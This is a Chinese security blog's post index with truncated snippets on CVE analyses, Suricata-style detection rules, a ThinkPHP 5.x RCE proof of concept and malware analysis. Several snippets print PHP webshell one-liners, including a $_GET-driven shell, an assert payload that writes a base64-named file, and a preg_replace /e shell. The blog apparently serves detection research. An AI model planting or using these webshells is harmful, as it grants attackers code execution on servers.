- 博客(21)
- 资源 (18)
- 收藏
- 关注
RSS订阅原创 Jsonp劫持攻击理解
Jsonp的劫持Ajax、Jsonp和Json的区别Ajax:web端通过GET或POST等HTTP协议请求从外部获取数据并进行数据的处理,默认不能跨域(域名端口相同原则),但可以通过代理跨域;$.ajax({url:‘请求地址’,type: ‘请求方式: 默认是’GET’,常用的还有’POST’ ',dataType: ‘设置返回的数据格式,常用的是’json’格式,也可以设置为’html’ ‘,data: ‘设置发送给服务器的数据’,success: ‘设置请求成功后的回调函数’,
2020-06-29 16:47:13
706
原创 X-Forwarded-For和X-Real-IP区分
前言在做检测产品的时候,碰到了X-Forwarded-For和X-Real-IP这两个HTTP头部字段,这两个一直稀里糊涂的,专门针对两个字段进行了分析和理解。代理的区分反向代理和正向代理企业服务器以集群方式进行部署,并通过负载均衡方式对外提供应用服务,一般负载均衡可以是软件(nginx),也可以是硬件设备,以B/S通信数据(浏览器)为例,我们通过GET方式访问企业域名服务器,负载均衡设备就会按照当前各个子服务器运行状况进行任务分发,分给空闲的服务器,从客户端来看,请求的目的地址就是服务器设备,其实
2020-06-16 14:57:30
3682
1
原创 CVE-2019-5418
MSGAction View中存在安全漏洞。攻击者可利用该漏洞泄露文件内容。信息预览:规则pcre:"/Accept\x3a[^\n]*\{\{[^\S]/"flow:established,to_server; pcre:"/Accept\x3a[^\n]+\{\{[^\S]/Hi";reference:url,https://mp.youkuaiyun.com/mdeditor/89084...
2020-06-05 15:52:52
222
原创 CVE-2019-3396
信息Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki,帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Widget Connector是 Confluence 的窗口小部件,使用Widget Connector 能将在线视频、幻灯片、图片等直接嵌入网页页面中。Atlassian Confluence Server是澳大利亚Atlass...
2020-06-05 15:52:46
242
原创 PHP 功能木马 webshell
MSG1、PIC:特征:Cookie: envlpass=97faf8f61ca07a06f7bb999737158d4c; serveru=192.168.36.133%2Fwebshell%2F1%2F74c92f29cf15de34b8866db4b40748243fb938b4.php; serverp=nihaoa后门:qyvc.com检测:pcre:"/Cookie\...
2020-06-05 15:52:35
525
原创 PHP assert() webshell
@[TOC](PHP assert() webshell)引言收集PHP一句话木马 assert() websell,并提供相应的检测方法。案例1、<?php $_GET['a']($_GET['b']);?>?a=assert&b=phpinfo()?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%...
2020-06-05 15:51:55
569
原创 PHP preg_replace函数 webshell
MSGpreg_replace 函数执行一个正则表达式的搜索和替换。<? echo preg_replace("/test/e",$_GET["h"],"jutst test"); ?> 如果我们提交?h=phpinfo(),phpinfo()将会被执行(使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行)案例<?p...
2020-06-05 15:51:44
326
原创 thinkphp 5.x全版本任意代码执行
MSGThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,从而被 GetShell。POC反斜杠解析成类造成命令执行thinkphp 5.0.221、http://192.168.1.1/thinkphp/public/?s=.|think\...
2020-06-05 15:51:33
973
原创 CVE-2016-9565
CVE-2016-9565MSGNagios是美国程序员Ethan Galstad所研发的一套开源的系统运行状态和网络信息监控程序。该程序提供网络服务监控、主机资源监控、短信报警等功能。Nagios Core 4.2.2之前的版本中的MagpieRSS存在安全漏洞。攻击者可通过伪造特制的响应利用该漏洞读取和写入任意文件。进程docker pull medicean/vulapps:n_n...
2020-06-05 15:51:22
635
原创 SQL注入-整形溢出报错注入原理exp
msgmysql> select exp(710);ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'exp()即为以e为底的对数函数,即求解e的710次方,当传递一个大于709的值时,函数exp()就会引起一个溢出错误。 select ~0;+----------------------+| ~0 ...
2020-06-05 15:50:41
704
原创 APT 34 dns-redir
dns-redir功能DNS转发代理功能文件congfig.json 域名设置dnsd.py python转发脚本代码文件:https://github.com/Fate9091/APT34/blob/master/redir_dns.rar
2020-06-05 15:50:30
148
原创 svchost.exe dll调试
svchost.exe 用微软的话来说:它是一个从动态链接库(DLL)中运行的服务的通用主机进程名称。一般存放在系统目录(%SystemRoot%)下的System32文件夹里。每次计算机启动的时候Svchost都会从注册表中读取服务列表,加载服务。 Svchost本身只是作为服务宿主,并不实现任何服务功能,需要Svchost启动的服务以动态链接库形式实现,在安装这些服务时,把服务的可执行程序...
2020-06-05 15:50:22
385
原创 SQL注入-updatexml() extractvalue() 函数
msgUPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找到的符合条件的数据作...
2020-06-05 15:50:12
517
原创 CVE-2019-1003000
msg -未成功还原Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。近日Jenkins官网发布了编号为SECURITY-1266的安全通告,修复了3个CVE漏洞。这三个CVE漏洞都是由台湾安全研究员orange报告的,CVE编号分别为CVE-2019-1003000、CVE-2019-10...
2020-06-05 15:49:56
348
原创 CVE-2018-9206
MSGBlueimp jQuery-File-Upload是一款支持多种语言的文件上传工具,它包括文件选择、文件拖放、进度条显示和图像预览等功能。Blueimp jQuery-File-Upload 9.22.0及之前版本中存在任意文件上传漏洞。远程攻击者可利用该漏洞执行代码。POCPOC一:https://github.com/lcashdol/Exploits/tree/master/...
2020-06-05 15:49:40
637
原创 security Onion
引言内容ISO:securityonion-16.04.5.6.iso外网页面访问UFW sudo ufw allow 80 开放80端口UFW sudo ufw allow 443或者关闭防火墙:/usr/sbin/ufw disable重启HIDS 大部分重启命令在/usr/sbin目录so开头的脚本文件/usr/sbin/so-sensor-restart /e...
2020-06-05 15:49:23
334
原创 PHP 流包装器实现WebShell
引言收集PHP一些常用webshell案例优点:使用php://input 流包装的形势来执行命令。<?phpclass ShellStream{ protected $position; protected $code; public function stream_open($path, $mode, $options, &$opened_...
2020-06-05 15:48:57
252
原创 Kali Linux安装docker
Kali install Dcoker1. update-get updateA:看一下系统date 是不是最新时间A:添加keysudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 错误的key值(3B4FE6ACC0B21F32)2. 编辑lsb_releasevi /etc/lsb_releaseDI...
2019-03-21 15:57:32
2231
原创 CVE-2012-0158样本分析
样本分析记录样本概述类型信息样本名个人简历.docmd518C6A011C63390195EE12CCD43C3C829分析工具x32db wireshark样本行为总结样本doc漏洞:CVE-2012-0158样本行为: 通过DOC溢出执行shellcode,访问phone.ftp.sh/c.png下载c.png文件保存到本地并执行,而c.pn...
2019-03-19 17:26:16
472
原创 JAVA反序列化漏洞研究
JAVA反序列化漏洞研究引言调试环境的搭建漏洞分析攻击代码的分析参考引言参考目前网上JAVA反序列化漏洞文章,本地搭建漏洞模拟环境,利用开源的JAVA反序列化漏洞攻击工具,模拟黑客攻击场景,并分析反序列化攻击的通信行为,预期根据特征或AI算法结合Suricata提出相应的检测方案。调试环境的搭建commons-collections-3.2.jarhttps://mvnrepos...
2019-02-27 16:36:02
627
原创 民生银行直销银行手机登陆加密算法的分析
民生银行直销银行手机登陆加密算法的分析引言环境的设置认证加密算法分析总结引言日常工作中,正好碰到针对银行类系统的安全测试工作,通过Burp抓包发现传输的信息都是一串加密的数据,因此,就针对其中一个系统进行代码分析,了解银行一般是通过何种方式来实现数据的加密,顺便巩固一下JS调试技巧。环境的设置1、为了模拟手机访问直销银行登陆页面,利用Chrome F12开发工具,点击左上角"toggle ...
2019-02-17 23:51:53
1710
4
利用JBoss Seam框架开发高校毕业生论文选题系统
2013-03-22
等保测评概述
2013-03-22
puttey.rar
2020-01-09
lcx端口转发工具
2012-06-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人